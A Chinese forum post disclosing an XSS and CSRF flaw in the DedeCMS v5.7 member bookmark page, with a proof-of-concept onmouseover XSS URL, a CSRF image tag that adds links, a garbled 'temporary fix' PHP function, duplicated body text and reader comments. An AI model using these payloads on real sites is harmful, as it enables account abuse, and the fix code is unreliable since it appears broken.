DEDECMS v5.7(2013-06-07) xss+csrf 0day
不知有人发过没有?有则删之,无则留之。。。
书签管理存在xss+csrf
http://localhost/dedecms/member/flink_main.php
xss:http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test' onmouseover=alert(1);'&url=test' onmouseover=alert(1);'
CSRF:<img src="http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test&url=test">
临时修复方法:
function GetLinkList(&$dsql)
{
global $cfg_ml;
$dsql->SetQuery("SELECT * FROM `#@__member_flink` WHERE mid='".$cfg_ml->M_ID."' ORDER BY aid DESC");
$dsql->Execute();
$j=0;
while($row = $dsql->GetArray())
{
$j++;
$line = "
<div class='item flink'>
<div class='itemHead' >
<div class='fRight'>
<span class='itemDigg'><a href='#' />";
echo $line;
}
if($j==0)
{
echo "尚无任何链接";
}
}
书签管理存在xss+csrf
http://localhost/dedecms/member/flink_main.php
xss:http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test' onmouseover=alert(1);'&url=test' onmouseover=alert(1);'
CSRF:<img src="http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test&url=test">
临时修复方法:
function GetLinkList(&$dsql)
{
global $cfg_ml;
$dsql->SetQuery("SELECT * FROM `#@__member_flink` WHERE mid='".$cfg_ml->M_ID."' ORDER BY aid DESC");
$dsql->Execute();
$j=0;
while($row = $dsql->GetArray())
{
$j++;
$line = "
<div class='item flink'>
<div class='itemHead' >
<div class='fRight'>
<span class='itemDigg'><a href='#' />";
echo $line;
}
if($j==0)
{
echo "尚无任何链接";
}
}
关于作者
评论16次
dedecms的会员xi统 一大堆的洞。 楼主加油。
即全面又牛B
路过 围观 膜拜 - - xss一直都是模模糊糊 感谢分享 研究下看看
看来dede还是很多洞啊
这织梦已经被搞烂了
非sns站,xss的威力可能要稍高于csrf,如果二者结合下。。。。。嘿嘿、xi望lz继续深入
围观,收藏下。。哟西。。。。。。。。。
支持个先 有时间下来研究下
csrf 这个一般的利用是
不顶天理不容
一定收藏,要不然到时用真是手短啊。
围观一下!!!!
又是dede....
路过
收藏。。 围观
前排留名 火速围观.